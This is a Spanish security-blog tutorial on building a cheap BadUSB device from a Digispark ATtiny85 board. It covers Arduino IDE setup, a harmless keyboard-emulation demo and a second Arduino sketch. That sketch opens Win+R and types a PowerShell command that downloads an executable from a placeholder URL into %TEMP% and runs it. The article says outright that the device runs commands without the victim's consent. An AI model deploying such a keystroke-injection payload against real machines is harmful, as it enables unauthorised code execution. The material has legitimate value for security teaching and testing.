Seguridad en Sistemas y Técnicas de Hacking. TheHackerWay (THW)

BadUSB Ultra Low Cost

Sobre los autores: Ernesto Sanchez (@ernesto_xload) y Joel Serna(@JoelSernaMoreno) son consultores en seguridad informática que han participado en eventos como: Navaja Negra, MorterueloCON y Eastmadhack.

Buenos días a todos!

Teníamos pensado hacer 3 artículos sobre distintos BadUSB: (“Introducción”, “Low-cost” y “Soluciones profesionales”), pero dentro de nuestra manía de empezar la casa por el tejado, hemos decidido empezar con un artículo de ultra low cost, mostrando como hacer un BadUSB por 1 euro aproximadamente, que en muchas ocasiones podrá hacer las mismas funciones que el famoso USB Rubber Ducky de Hack5 (44,95 US$ + envío), si, sabemos que puede parecer una locura, pero funciona.

La idea, básica y extremadamente resumida de BadUSB, por si alguien no sabe de que va el asunto aún, es emular un teclado sobre un dispositivo USB normal, para poder emular el comportamiento del usuario, y por tanto poder ejecutar comandos y programas en el sistema atacado, sin el consentimiento de la víctima.

Hemos utilizado como hardware el Digistump Digispark, éste dispositivo utiliza el microcontrolador Attiny85 de Microchip. Dicho microcontrolador es un micro de 8 bits que nos ofrece: 8kb de memoria flash, 512b EEPROM, 512b SRAM y 6 puertos I/O (Enlace al datasheet completo). De este dispositivo se pueden encontrar múltiples clones, con distintos tipos puertos USB, realizados en China en páginas como Aliexpress o Ebay por precios que rondan 1 euro.

Configuración e instalación del software

Una vez hemos obtenido el dispositivo, tenemos que tener en cuenta que, primero tenemos que instalar el IDE de Arduino y también los drivers en el caso de Windows (Aqui).

NOTA: no es aconsejable instalar el IDE de Arduino desde repositorios de nuestra distribución de Linux, suele ser una versión algo obsoleta y puede darnos problemas. Destacar que el funcionamiento del dispositivo es ligeramente distinto a cualquier otro Arduino con el que hayamos trabajado anteriormente y necesita ser desconectado y conectado para ser reprogramado (Hay disponible un dispositivo para hacer ésto por hardware mediante un interruptor disponible aquí, pero no creemos que sea tanta molestia conectar y desconectar el dispositivo cada vez). Lo primero es tener la última versión del arduino IDE (Aquí) y asegurarnos que está todo actualizado.

El segundo paso es bajar el paquete de compatibilidad con ésta placa y el IDE de Arduino para poder trabajar correctamente con ella, para ello tenemos que ir a Archivo -> Preferencias -> Gestor de URLs Adicionales de Tarjetas y añadiremos en una nueva linea lo siguiente (si tenemos alguna no es incompatible):

http://digistump.com/package_digistump_index.json

Simplemente aceptamos y vamos a Herramientas -> Placa -> Gestor de Tarjetas, aquí buscamos Digistump AVR Boards y procedemos a su instalación.

En caso de usar linux, es posible que tengas que tener la versión actual y legacy de libusb, así como añadir unas reglas nuevas de udev, hay un tutorial de Digistump aquí. Comentar que las librerías originales de Digistump solo poseen soporte para emular teclados con el layout en_US (Inglés de EEUU), con lo que es muy aconsejable descargar e instalar la librería con soporte para otros idiomas, disponible aquí.

Hola Mundo

Lo mas clásico, cuando hablamos de microcontroladores, es hacer un blinking led como “Hola mundo”, ésto es un programa que haga parpadear un led a una frecuencia determinada, como en nuestro caso nuestro dispositivo puede comunicarse con algo mas que un led vamos a hacer un “Hola mundo” mediante teclado USB. Tenemos que abrir el IDE de Arduino que hemos descargado y configurado anteriormente, también nos tenemos que asegurar que hemos configurado la placa correcta, para ello vamos a Herramientas -> Placa y seleccionamos “Digisparck (Default – 16.5 mhz)” y ningún puerto.

Como código escribiremos el siguiente:


#define kbd_es_es
#include "DigiKeyboard.h"

void setup() {
  DigiKeyboard.update();
  DigiKeyboard.delay(5000);
}

void loop() {
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  delay(250);
  DigiKeyboard.println(F("notepad"));
  delay(250);
  DigiKeyboard.println(F("Hola mundo!"));
  while(1);
}

El código es muy simple, pero vamos a explicarlo mas detalladamente:

Lo siguiente es compilar y subir el código, primero podemos pulsar el botón de Verificar para asegurarnos de que no existe ningún error y después pulsar el botón Subir, NOTA: Sin conectar el dispositivo aún. A los pocos segundos, el IDE nos pedirá que conectemos el dispositivo y lo reprogramará como podemos ver en la siguiente captura. Ya está nuestro “hola mundo”, a los pocos segundos ejecutará el código, dicho código está guardado en la flash del Attiny85 con lo que se ejecutará cada vez que conectemos el dispositivo a un ordenador.

Haciendo maldades

Una vez hemos hecho el “Hola mundo” y utilizando el mismo esquema, podemos hacer muchas otras tareas de forma automática, y no todas “buenas” (de ahí el nombre de BadUSB), por ejemplo el siguiente código descarga mediante Powershell un archivo desde una URL y lo ejecuta:


#define kbd_es_es
#include "DigiKeyboard.h"

void setup() {
  DigiKeyboard.update();
  pinMode(1, OUTPUT);
  DigiKeyboard.delay(10000);
}

void loop() {
  delay(1000);
  DigiKeyboard.update();
  delay(100);
  
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // meta+r
  delay(100);
  DigiKeyboard.print(F("powershell "));
  DigiKeyboard.print(F("powershell Import-Module BitsTransfer;"));
  DigiKeyboard.print(F("Start-BitsTransfer -Source \"http://ruta/fichero.exe\" -Destination \"%TEMP%\\fichero.exe\";"));
  DigiKeyboard.println(F("Start-Process \"%TEMP%\\fichero.exe\""));
  
  while(1){
    digitalWrite(1, HIGH);
    delay(1000);
    digitalWrite(1, LOW);
    delay(1000);
  }
}

Se puede observar que al final se ha incluido el código necesario para que el led parpadee y sepamos que la tarea se ha completado.

A partir de aquí el límite es la imaginación de cada uno, como ejemplo el payload que mencionan Álvaro Nuñez-Romero y Santiago Hernández en su artículo para el blog “un informático en el lado del mal” titulado Arducky: Un Rubber Ducky hecho sobre Arduino para hackear Windows #Arduino

También mencionar a KALRONG en su artículo ATtiny85 el famoso Cheap Rubber Ducky, podemos encontrar aquí un conversor de scripts de USB Rubber Ducky al Attiny85, aunque nosotros pensamos que es mejor opción escribirlos enteros de forma nativa por optimización y depuración de los mismos.

Un saludo y hasta la próxima (o próximas)!